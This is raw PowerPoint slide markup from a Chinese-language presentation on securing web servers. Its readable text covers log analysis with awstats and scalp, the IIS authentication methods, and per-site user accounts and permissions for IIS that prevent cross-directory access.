            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10307320" h="368935">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10306812" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10306812" y="368807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36880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319" y="2857436"/>
            <a:ext cx="10316845" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10316845" h="379094">
                <a:moveTo>
                  <a:pt x="10311726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68" y="377951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241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10311726" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031648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10316489" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10316248" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10315575" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10314520" y="377951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10313200" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10311726" y="378853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10316845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16845" h="379094">
                <a:moveTo>
                  <a:pt x="1030696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06964" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10306964" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10316845" h="379094">
                <a:moveTo>
                  <a:pt x="10306964" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10306964" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10311726" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10316489" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10316489" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10311726" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10306964" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10316845" h="379094">
                <a:moveTo>
                  <a:pt x="10316489" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10311726" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10306964" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10316489" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10316489" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10316845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10316845" h="379094">
                <a:moveTo>
                  <a:pt x="10306964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10306964" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10306964" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10316845" h="379094">
                <a:moveTo>
                  <a:pt x="10316489" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10306964" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10311726" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10316489" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10316489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7723"/>
            <a:ext cx="10677525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u="sng" spc="-1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2"/>
              </a:rPr>
              <a:t>http://www.awstats.org/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日志安全分析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scalp</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="461645">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1645"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>使用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#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> ./scalp-0.4.py</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> -l </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/var/log/httpd/access_log</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> -f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./default_filter.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>./scalp-output --html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690" y="459473"/>
            <a:ext cx="2084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II</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2DED1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2DED1"/>
                </a:solidFill>
                <a:latin typeface="Droid Sans Fallback"/>
                <a:cs typeface="Droid Sans Fallback"/>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Droid Sans Fallback"/>
              <a:cs typeface="Droid Sans Fallb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850" y="1596452"/>
            <a:ext cx="16461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安装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78452" y="1575816"/>
            <a:ext cx="5649467" cy="4443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1893" y="3767645"/>
            <a:ext cx="801888" cy="125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0053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IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>服务器配置</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="210" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>身份认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>证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39851" y="1450397"/>
            <a:ext cx="9563100" cy="3840479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身份验证功能，对访问用户进行控</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="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制</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="215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网站默认是允许所有用户连接，如果网站的只需要针对特定用户来开放的话，就需要对用 户进行验证，而进行验证的主要方法有：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94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匿名身份验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证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基本身份验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证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摘要式身份验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证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Windows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集成身份验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证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系统默认只启用了匿名身份验证，另外三中需要通过添加角色服务的方式来添加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身份认证顺序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：匿名身份验证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1800" spc="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windows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验证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1800" spc="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摘要式身份验证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基本身份验证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https://technet.microsoft.com/zh-CN/library/hh831496.aspx#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匿名身份验证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18976" y="3811270"/>
            <a:ext cx="573405" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="573404" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573024" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57302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15365" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1015365" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1014984" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101498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4983" y="2400300"/>
            <a:ext cx="10076815" cy="368935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10076815" h="368935">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10076688" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10076688" y="368807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36880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0348" y="2394851"/>
            <a:ext cx="10085705" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10085705" h="379094">
                <a:moveTo>
                  <a:pt x="10080790" y="378866"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="378866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="377951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="375577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10080790" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1008555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69341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10085552" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10085311" y="375577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10084638" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10083584" y="377951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10082250" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10080790" y="378866"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10085705" h="37909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085705" h="379094">
                <a:moveTo>
                  <a:pt x="1007602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0076027" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10076027" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10085705" h="379094">
                <a:moveTo>
                  <a:pt x="10076027" y="374103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10076027" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10080790" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10085552" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10085552" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10080790" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10076027" y="374103"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10085705" h="379094">
                <a:moveTo>
                  <a:pt x="10085552" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10080790" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10076027" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10085552" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10085552" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10085705" h="379094">
                <a:moveTo>
                  <a:pt x="9525" y="374103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="374103"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10085705" h="379094">
                <a:moveTo>
                  <a:pt x="10076027" y="374103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10076027" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10076027" y="374103"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10085705" h="379094">
                <a:moveTo>
                  <a:pt x="10085552" y="374103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10076027" y="374103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10080790" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10085552" y="369341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10085552" y="374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4983" y="2950464"/>
            <a:ext cx="10604500" cy="3415665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10604500" h="3415665">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10603992" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10603992" y="3415284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="341528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r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>假如有三个站点，分别为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Website01， Website02， Website03</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>物理路径分别为：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>d:\inetpub\wwwroot\website01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>d:\inetpub\wwwroot\website02</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>d:\inetpub\wwwroot\website03</a:t>
            </a:r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348" y="2944952"/>
            <a:ext cx="10612755" cy="3426460"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10612755" h="3426460">
                <a:moveTo>
                  <a:pt x="10607916" y="3425837"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="3425837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="3425609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="3424936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="3423881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="3422548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3421075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10607916" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1061267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416312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="3416312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3421075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10612678" y="3421075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10612437" y="3422548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10611764" y="3423881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10610710" y="3424936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10609376" y="3425609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10607916" y="3425837"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10612755" h="34264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612755" h="3426460">
                <a:moveTo>
                  <a:pt x="1060315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603153" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10603153" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10612755" h="3426460">
                <a:moveTo>
                  <a:pt x="10603153" y="3421075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10603153" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10607916" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10612678" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10612678" y="3416312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10607916" y="3416312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10603153" y="3421075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10612755" h="3426460">
                <a:moveTo>
                  <a:pt x="10612678" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10607916" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10603153" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10612678" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10612678" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10612755" h="3426460">
                <a:moveTo>
                  <a:pt x="9525" y="3421075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="3416312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3416312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3421075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10612755" h="3426460">
                <a:moveTo>
                  <a:pt x="10603153" y="3421075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="3421075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3416312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10603153" y="3416312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10603153" y="3421075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10612755" h="3426460">
                <a:moveTo>
                  <a:pt x="10612678" y="3421075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10603153" y="3421075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10607916" y="3416312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10612678" y="3416312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10612678" y="34210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9333" y="1470723"/>
            <a:ext cx="10523474" cy="129009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利用账号控制</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="235" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040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eb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目录的访问权限，防止跨目录访问</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="466090" marR="2243455" indent="-454025">
              <a:lnSpc>
                <a:spcPts val="3320"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1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对于多站点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65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每个站点建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>一个目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="466090" marR="2243455" indent="-454025">
              <a:lnSpc>
                <a:spcPts val="3320"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="145"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pP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>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>实现各个虚拟主机目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>有独立权限的访问机制，防止跨站目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>攻击等问题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3849" y="4067314"/>
            <a:ext cx="10615423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oto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>则需要：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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="70" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>建立一个</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IISUSER_GR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OUP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>用户组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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="50" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>建立三个用户</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="50">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IISUSER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>_01-03</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="-5">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>选中用户不能更改密码和密码永不过期，去掉其余两</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="-5">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>复选</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700"/>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>把新用户加入</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>R_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>GROUP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>组，并从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>组删除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4</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、选中</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>eb</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>si</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>te01</a:t>
            </a:r>
            <a:r>
